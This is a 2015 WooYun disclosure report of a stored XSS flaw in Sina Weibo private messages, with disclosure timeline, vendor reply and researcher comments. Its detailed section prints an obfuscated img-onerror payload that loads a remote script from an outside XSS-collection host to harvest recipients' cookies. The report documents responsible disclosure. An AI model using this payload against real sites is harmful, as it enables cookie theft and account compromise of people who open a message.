当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090494

漏洞标题:新浪微博私信存在存储型XSS漏洞(指哪打哪)

相关厂商:新浪微博

漏洞作者: Non-polar

提交时间:2015-01-07 16:13

修复时间:2015-02-21 16:14

公开时间:2015-02-21 16:14

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-08: 厂商已经确认,细节仅向厂商公开
2015-01-18: 细节向核心白帽子及相关领域专家公开
2015-01-28: 细节向普通白帽子公开
2015-02-07: 细节向实习白帽子公开
2015-02-21: 细节向公众公开

简要描述:

这次也没有王思聪,也没有雷军,不过有cookie了,其实昨天下午已经收到了,但是有延迟,没注意,不过获取的cookie中没有关键的字段(httponly),但XSS的影响还是存在的,囧.............

详细说明:

问题发生在新浪微博的私信处,正常的私信是会过滤的。不过当私信突破字节限制时,XSS就会被执行。

<img src=x onerror=eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,114,101,47,55,48,52,50);document.body.appendChild(window.s)')>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111


上图

3.png


漏洞证明:

3.png

修复方案:

你们懂的

版权声明:转载请注明来源 Non-polar@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-01-08 10:57

厂商回复:

此漏洞已由白帽子报告过,感谢关注新浪安全。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-07 16:22 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    yo 有点屌

  2. 2015-01-07 16:31 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    要火, 留位

  3. 2015-01-07 16:39 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    这个叼!

  4. 2015-01-07 17:11 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    你的描述和标题,看来火不了

  5. 2015-01-07 17:15 | 小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)

    CCTV拍这里

  6. 2015-01-07 17:34 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)

    这个厉害

  7. 2015-01-07 17:41 | Non-polar ( 实习白帽子 | Rank:34 漏洞数:16 | 只要还有明天,今天就永远是起跑线)

    @猪猪侠 悲催了,我也想上头条,不过有个地方没绕过,火候太浅了,还是要想前辈们学习

  8. 2015-01-07 17:48 | 小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)

    @Non-polar 看来你是修炼的一百多天出来了啊

  9. 2015-01-07 17:55 | Non-polar ( 实习白帽子 | Rank:34 漏洞数:16 | 只要还有明天,今天就永远是起跑线)

    @小人物Reno 哈哈,这都被你看出来了

  10. 2015-01-07 17:56 | Non-polar ( 实习白帽子 | Rank:34 漏洞数:16 | 只要还有明天,今天就永远是起跑线)

    XSS大牛们都来为围观了,求公开后不要打我.....

  11. 2015-01-07 21:05 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    我只可以说漏洞详情太漂亮了

  12. 2015-01-08 09:21 | Non-polar ( 实习白帽子 | Rank:34 漏洞数:16 | 只要还有明天,今天就永远是起跑线)

    @疯狗@xsser 求更新漏洞......

  13. 2015-01-08 11:43 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    mark

  14. 2015-01-08 11:46 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    靠地, 牛逼看看是否有爆过

  15. 2015-01-08 12:00 | Non-polar ( 实习白帽子 | Rank:34 漏洞数:16 | 只要还有明天,今天就永远是起跑线)

    @新浪微博 额,白帽子是什么时候提交的,没搜到啊,囧........

  16. 2015-01-08 12:10 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    diao

  17. 2015-01-08 12:15 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @Non-polar 你就认了吧~~~~~他们说修补了你有什么治?